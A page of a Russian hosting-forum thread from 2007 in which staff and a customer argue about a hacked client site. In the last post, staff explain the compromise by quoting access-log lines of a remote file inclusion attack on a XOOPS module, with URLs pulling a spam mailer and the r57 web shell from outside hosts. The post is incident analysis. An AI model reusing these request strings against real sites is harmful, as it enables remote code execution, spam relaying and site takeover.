Net Форумы

 
 FAQFAQ   ПоискПоиск   ПользователиПользователи   ГруппыГруппы   РегистрацияРегистрация 
 ПрофильПрофиль   Войти и проверить личные сообщенияВойти и проверить личные сообщения   ВходВход 
Генеральный спонсор: www.Net.Ru - серьезный, профессиональный хостинг.

Претензия
На страницу Пред.  1, 2, 3, 4, 5, 6  След.
 
Начать новую тему   Ответить на тему    Список форумов Net Форумы -> Talk - разговоры
Предыдущая тема :: Следующая тема  
Автор Сообщение
ser_ru
Member


Зарегистрирован: 06.06.2007
Сообщения: 17
Откуда: Екатеринбург

СообщениеДобавлено: 07.06.2007 15:38    Заголовок сообщения: Ответить с цитатой

Это опять я, киддис-манагер
1. snmp - простой протокол управления сетью (В.Г.Олифер Н.А.Олифер Компьютерные сети с152) и к преобразованию mac адресов в символьные имена (канальный уровень модели OSI) никакого отношения не имеет.
2. Ради интереса мне прислали логи и уменя глупый вапрос а где в них время ?
3. От вас Al-x кстати кроме оскарблений ничего тоже не поступило.

Граждане Умные админы рекомендую вам сходить на www.bsdportal.ru - хоть познакомитесь с NIX и почитать В.Г.Олифер Н.А.Олифер Компьютерные сети .
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Al-x
Member


Зарегистрирован: 02.06.2005
Сообщения: 33
Откуда: Санкт-Петербург

СообщениеДобавлено: 07.06.2007 15:42    Заголовок сообщения: Ответить с цитатой

ser_ru писал(а):
3. От вас Al-x кстати кроме оскарблений ничего тоже не поступило.

зачем же так? от меня была просьба, объяснить мне не разумному, что же так на открытые порты накинулись. гляньте мой первый пост в этой теме.
кстати, у Вас не так много времени осталось, что бы доказать свою состоятельность Smile
а вот мне, кстати, этого делать не надо, потому как я не утверждал, что знаю больше всех и что могу настроить сервера гораздо лучше, чем это сделано на выбранном мною хостинге.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
dimcha
Core team


Зарегистрирован: 30.01.2004
Сообщения: 41

СообщениеДобавлено: 07.06.2007 15:48    Заголовок сообщения: Ответить с цитатой

ser_ru писал(а):
Это опять я, киддис-манагер
1. snmp - простой протокол управления сетью (В.Г.Олифер Н.А.Олифер Компьютерные сети с152) и к преобразованию mac адресов в символьные имена (канальный уровень модели OSI) никакого отношения не имеет.
2. Ради интереса мне прислали логи и уменя глупый вапрос а где в них время ?
3. От вас Al-x кстати кроме оскарблений ничего тоже не поступило.

Граждане Умные админы рекомендую вам сходить на www.bsdportal.ru - хоть познакомитесь с NIX и почитать В.Г.Олифер Н.А.Олифер Компьютерные сети .


1. я в курсе, только как это относится к нашему хостингу? мы snmp не используем. так-же как и самбу, поэтому и написал их вместе.
2. в первом столбце - формат unixtime

$ date -r _time_

надо понимать, что Ваша придирка к snmp была последней возможностью хоть как-то сохранить хорошую мину при плохой игре?? Или еще остались вопросы по открытим портам и демонам?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
AP
Core team


Зарегистрирован: 14.02.2005
Сообщения: 444
Откуда: LostHold

СообщениеДобавлено: 07.06.2007 15:50    Заголовок сообщения: Ответить с цитатой

2ser_ru

Меня, честно говоря, удивляет, что unix админ не знает про unix формат времени. Smile И вы, при этом, рекомендуете нам узнать, что же такое unix?


2Al-x

Там за пару минут можно управиться. У меня, правда, желание уже опубликовать, что и как было.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Al-x
Member


Зарегистрирован: 02.06.2005
Сообщения: 33
Откуда: Санкт-Петербург

СообщениеДобавлено: 07.06.2007 16:05    Заголовок сообщения: Ответить с цитатой

AP писал(а):
2ser_ru

Меня, честно говоря, удивляет, что unix админ не знает про unix формат времени. Smile И вы, при этом, рекомендуете нам узнать, что же такое unix?

пять балов Smile

AP писал(а):
2Al-xУ меня, правда, желание уже опубликовать, что и как было.

при всём моём уважение: договор есть договор.
дайте парню шанс Cool
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
ser_ru
Member


Зарегистрирован: 06.06.2007
Сообщения: 17
Откуда: Екатеринбург

СообщениеДобавлено: 07.06.2007 16:26    Заголовок сообщения: Ответить с цитатой

Покажите очень тупому админу как перевести это в нормальное время :

18664 GET www.satur.ru /modules/news/article.php?storyid=33 - Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) -
1180728467 141.76.45.35 404 486 GET www.satur.ru //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://firp.it/mambots/editors/jce/jscripts/tiny_mce/plugins/fullscreen/images/final.txt? - Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 -
1180728468 141.76.45.34 403


Последний раз редактировалось: ser_ru (07.06.2007 16:28), всего редактировалось 1 раз
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
AP
Core team


Зарегистрирован: 14.02.2005
Сообщения: 444
Откуда: LostHold

СообщениеДобавлено: 07.06.2007 16:28    Заголовок сообщения: Ответить с цитатой

1180728106

ap$ date -r 1180728106
Sat Jun 2 00:01:46 MSD 2007



Кстати, логи в формате squid
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
ser_ru
Member


Зарегистрирован: 06.06.2007
Сообщения: 17
Откуда: Екатеринбург

СообщениеДобавлено: 07.06.2007 16:31    Заголовок сообщения: Ответить с цитатой

Скажите а как тупые люди должны понимать эти логи если незнают в чем они сгенерированы.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Al-x
Member


Зарегистрирован: 02.06.2005
Сообщения: 33
Откуда: Санкт-Петербург

СообщениеДобавлено: 07.06.2007 16:32    Заголовок сообщения: Ответить с цитатой

с другой стороны, наверное будет более гуманно остановить это издевательство над
LORD писал(а):
P.S. А господин ser_ru вообще один из лучших админов! Его точно половина провайдеров знает!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
AP
Core team


Зарегистрирован: 14.02.2005
Сообщения: 444
Откуда: LostHold

СообщениеДобавлено: 07.06.2007 16:35    Заголовок сообщения: Ответить с цитатой

У нас на форуме и, если я не ошибаюсь, на сайте есть информация по поводу формата логов.

Последний раз редактировалось: AP (07.06.2007 16:39), всего редактировалось 1 раз
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
ser_ru
Member


Зарегистрирован: 06.06.2007
Сообщения: 17
Откуда: Екатеринбург

СообщениеДобавлено: 07.06.2007 16:36    Заголовок сообщения: Ответить с цитатой

Не знаю как у вас на Калыме у нас логи обычно выглядит так:

Jun 5 00:00:00 www newsyslog[54384]: logfile turned over due to size>100K
Jun 5 12:26:57 www sshd[56174]: Did not receive identification string from 62.94.144.227
Jun 5 12:29:31 www sshd[56175]: Illegal user admin from 62.94.144.227
Jun 5 12:49:37 www sshd[56215]: Did not receive identification string from 70.43.174.170
Jun 5 12:52:17 www sshd[56219]: Illegal user admin from 70.43.174.170
Jun 5 12:57:30 www sshd[56238]: Did not receive identification string from 216.144.238.152
Jun 5 13:00:07 www sshd[56258]: Illegal user admin from 216.144.238.152
Jun 5 13:00:09 www sshd[56260]: Illegal user admin from 216.144.238.152
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
AP
Core team


Зарегистрирован: 14.02.2005
Сообщения: 444
Откуда: LostHold

СообщениеДобавлено: 07.06.2007 16:37    Заголовок сообщения: Ответить с цитатой

Я не писал о /var/log/auth или /var/log/messages.
Это хоть на колыме, хоть где угодно формат squid'а
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
AP
Core team


Зарегистрирован: 14.02.2005
Сообщения: 444
Откуда: LostHold

СообщениеДобавлено: 07.06.2007 16:42    Заголовок сообщения: Ответить с цитатой

Кстати unix time довольно распространен, его используют многие программы на выводе. Правда, сейчас я могу вспомнить только printk в linux kernel на загрузке.

Ну, и естественно, что это внутренний формат времени, который используется программистами, imho как правило, при написании различных программ под unix.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
ser_ru
Member


Зарегистрирован: 06.06.2007
Сообщения: 17
Откуда: Екатеринбург

СообщениеДобавлено: 07.06.2007 16:46    Заголовок сообщения: Ответить с цитатой

Так мы общаемся с учень умными программерами а не админами!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
AP
Core team


Зарегистрирован: 14.02.2005
Сообщения: 444
Откуда: LostHold

СообщениеДобавлено: 07.06.2007 16:46    Заголовок сообщения: Ответить с цитатой

Время подходит к 18.00 посему я все же напишу, что и как. Однако, должен отметить, что уважаемый ser_ru вполне справился с задачей, судя по куску лога, который он привел. Это замечательно, и было бы еще замечетельней, если бы с этого все начиналось.


Максим, наколько я вижу, вы убрали с сайта все скрипты в принципе, в том числе и уязвимые, поэтому проблем в связи с указанием мною данной уязвимости не будет:

В логах можно найти следующие строчки:

... GET http://www.satur.ru:82/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://sigmafotbal.cz/org/mailer.txt?&?=v

... POST http://www.satur.ru:82/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://sigmafotbal.cz/org/mailer.txt?&?=v -
... POST http://www.satur.ru:82/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://sigmafotbal.cz/org/mailer.txt?&?=v

Таким образом был разослан спам. У уважаемого LORD'а возник вопрос, каким именно образом взлом одного клиента может нанести ущерб другим клиентам и нам. По-моему акцент на слове спам я же делал. Неужели серьезному администратору трудно сделать соответствующие выводы из этого?

Про то, что столь массавая рассылка спам дает дополнительную нагрузку на сервер можно было бы и не говорить. Лимиты стоят, но тем не менее определенную нагрузку создать можно, учитывая, что у sendmail'а менее строгие правила по кол-ву получателей и т.д., в силу того, что он и предназначен для рассылок (нормальных, разумеется).

Второе, и пожалуй, в данном контексте самое главное. Блок-листы. По-моему сейчас все труднее находить пользователей электронной почты, которые в связи с почтовыми трудностями не слышали этого слова. Системного администратора, в общем случае, тоже. Рассылки спама, в зависимости от их "удачности", могут парализовывать различные почтовые пересылки из-за довольно быстрого попадания сервера в блок-листы. Я ответил на Ваш вопрос по поводу ущерба, г-н LORD?


И наконец, встречается такая строчка, кстати, неоднократно:
... GET http://www.satur.ru:82/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.gonfiabiligamespark.it/flash/r57.txt?

r57.txt, думаю, что LORD и ser_ru представлять не надо, но кто-то может и не знать - это тулкит, типа шелла, для выполнения различных комманд на удаленном сервере, который очень любят использовать script kiddies. То есть, с данной уязвимостью на сайте можно сделать все-что угодно. Удалить весь контент, понаставить других закладок в скрипты и прочая.


Информация о самой уязвимости, которую несложно найти, зная какую версию CMS вам поставил вебмастер:

http://www.securityfocus.com/bid/24302/info
XOOPS IContent Module Spaw_Control.Class.PHP Remote File Include Vulnerability

Возможно есть что-то еще из уявимостей, тут уже нужно просто подробнее данным вопросом поинтересоваться.

Максим, у вас есть полный лог за двое полных суток, поэтому вы можете более тщательную проверку провести. На будущее, я бы порекомендовал вам создать у себя папку logs в корне домашнего каталога ( все согласно инструкциям ), тогда при возникновении проблем у вас будут логи за целую неделю.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Показать сообщения:   
Начать новую тему   Ответить на тему    Список форумов Net Форумы -> Talk - разговоры Часовой пояс: GMT + 3
На страницу Пред.  1, 2, 3, 4, 5, 6  След.
Страница 3 из 6

 
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах


Powered by phpBB
Русская поддержка phpBB